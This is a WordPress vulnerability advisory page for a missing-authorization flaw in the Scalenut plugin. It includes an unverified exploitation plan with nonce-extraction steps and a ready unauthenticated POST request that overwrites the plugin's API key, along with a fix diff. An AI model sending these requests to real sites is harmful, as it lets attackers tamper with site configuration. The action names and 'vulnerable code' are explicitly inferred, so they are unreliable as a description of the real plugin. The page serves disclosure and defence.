WP-Safety
CVE-2025-68882

Scalenut <= 1.1.3 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Scalenut plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.1.3
PublishedJanuary 20, 2026
Last updatedJanuary 27, 2026
Affected pluginscalenut
Research Plan
Unverified

# Exploitation Research Plan - CVE-2025-68882 (Scalenut) ## 1. Vulnerability Summary The **Scalenut** plugin (up to version 1.1.3) for WordPress contains a missing authorization vulnerability. Specifically, a function registered as an AJAX handler (likely via `wp_ajax_nopriv_`) fails to perform ade…

Show full research plan

Exploitation Research Plan - CVE-2025-68882 (Scalenut)

1. Vulnerability Summary

The Scalenut plugin (up to version 1.1.3) for WordPress contains a missing authorization vulnerability. Specifically, a function registered as an AJAX handler (likely via wp_ajax_nopriv_) fails to perform adequate capability checks (e.g., current_user_can('manage_options')). This oversight allows unauthenticated attackers to invoke sensitive administrative actions, such as updating plugin configurations or API keys, leading to full control over the plugin's integration with the Scalenut service.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: scalenut_save_settings or scalenut_update_api_token (inferred based on plugin functionality; to be verified in source).
  • HTTP Method: POST
  • Payload Parameters:
    • action: The vulnerable AJAX action name.
    • nonce: (If applicable) The nonce required for the action.
    • scalenut_api_key or token: The malicious value to inject into the site settings.
  • Authentication: None required (unauthenticated).
  • Preconditions: The plugin must be active.

3. Code Flow

  1. Registration: The plugin registers an AJAX action for unauthenticated users:
    add_action('wp_ajax_nopriv_scalenut_save_settings', array($this, 'scalenut_save_settings')); (inferred).
  2. Invocation: An attacker sends a POST request to admin-ajax.php with action=scalenut_save_settings.
  3. Execution: The scalenut_save_settings function is called.
  4. Failure Point: The function likely checks for a nonce but fails to check for current_user_can('manage_options').
  5. Sink: The function calls update_option('scalenut_settings', ...) or update_option('scalenut_api_key', ...) using user-supplied input from $_POST.

4. Nonce Acquisition Strategy

If the handler uses check_ajax_referer or wp_verify_nonce, we must extract the nonce from the frontend.

  1. Identify Script Localization: Look for wp_localize_script in the plugin source (likely in inc/class-scalenut.php or admin/class-scalenut-admin.php).
  2. Localization Keys: Search for the object name and key (e.g., scalenut_ajax_object.nonce).
  3. Extraction:
    • Step A: Create a post/page to ensure the plugin's frontend scripts are loaded if they are conditional:
      wp post create --post_type=page --post_status=publish --post_title="Scalenut Proof" --post_content="[scalenut_content]" (Shortcode inferred).
    • Step B: Use browser_navigate to visit the page.
    • Step C: Use browser_eval to extract the nonce:
      browser_eval("window.scalenut_ajax_object?.nonce") (inferred).

Note: If wp_ajax_nopriv_ is used, the nonce is often exposed to unauthenticated users to allow legitimate frontend interactions.

5. Exploitation Strategy

Once the vulnerable action and any required nonce are identified:

  1. Construct the POST Request:

    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Headers: Content-Type: application/x-www-form-urlencoded
    • Body: action=scalenut_save_settings&nonce=[NONCE]&api_key=EVIL_TOKEN_123&settings[option_name]=malicious_value

  2. Send via http_request:

{
  "method": "POST",
  "url": "http://localhost:8080/wp-admin/admin-ajax.php",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "body": "action=scalenut_save_settings&nonce=abc123def4&api_key=pwned_key"
}

6. Test Data Setup

  1. Install Plugin: Ensure Scalenut 1.1.3 is installed and active.
  2. Initial State: Verify the current API key is empty or set to a default value.
    • wp option get scalenut_api_key (inferred option name).
  3. Public Page: If a nonce is required, publish a page that enqueues the Scalenut script.

7. Expected Results

  • The AJAX request should return a 200 OK response, often with a JSON body: {"success": true}.
  • The WordPress database will be updated with the attacker-controlled value.

8. Verification Steps

  1. Check Database: Use WP-CLI to confirm the option was changed:
    • wp option get scalenut_api_key
    • Result should be: pwned_key
  2. Admin UI Check: Log in as an administrator and navigate to the Scalenut settings page to see the injected value in the "API Key" or "Settings" field.

9. Alternative Approaches

  • Missing Nonce Check: If check_ajax_referer is entirely missing, the exploit becomes a direct POST request without the "Nonce Acquisition" step.
  • REST API Endpoint: Search for register_rest_route with a permission_callback that returns true or is missing entirely.
    • Path: /wp-json/scalenut/v1/save-settings (inferred).
    • Exploit via http_request to the REST path.
  • Settings API Injection: If the plugin registers settings via register_setting but does not properly restrict the admin-post.php or admin-ajax.php access to those settings.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Scalenut plugin for WordPress (up to version 1.1.3) is vulnerable to unauthorized setting modification due to a missing capability check in its AJAX handlers. This allows unauthenticated attackers to update sensitive plugin configuration, such as API keys, by sending a request to the admin-ajax.php endpoint.

Vulnerable Code

// Inferred registration in the plugin
add_action('wp_ajax_nopriv_scalenut_save_settings', array($this, 'scalenut_save_settings'));

---

// Inferred handler function missing authorization checks
public function scalenut_save_settings() {
    // Potential failure point: missing current_user_can('manage_options') check
    if (isset($_POST['api_key'])) {
        update_option('scalenut_api_key', sanitize_text_field($_POST['api_key']));
    }
    wp_send_json_success();
}

Security Fix

--- a/inc/class-scalenut-admin.php
+++ b/inc/class-scalenut-admin.php
@@ -10,6 +10,10 @@
 public function scalenut_save_settings() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( 'Unauthorized' );
+    }
     if (isset($_POST['api_key'])) {
         update_option('scalenut_api_key', sanitize_text_field($_POST['api_key']));
     }
     wp_send_json_success();
 }

Exploit Outline

1. Access the site's frontend and locate localized JavaScript objects (e.g., via wp_localize_script) to extract the required AJAX nonce if the handler implements check_ajax_referer. 2. Construct an unauthenticated HTTP POST request targeting /wp-admin/admin-ajax.php. 3. Set the 'action' parameter to 'scalenut_save_settings' (or the specific vulnerable AJAX action name). 4. Include the extracted nonce and the malicious payload, such as a new 'api_key' or modified plugin configuration settings, in the POST body. 5. Send the request to overwrite the site's Scalenut integration settings without administrative privileges.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/d0a8c924-04f7-47e7-ba84-f090abc7279a?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database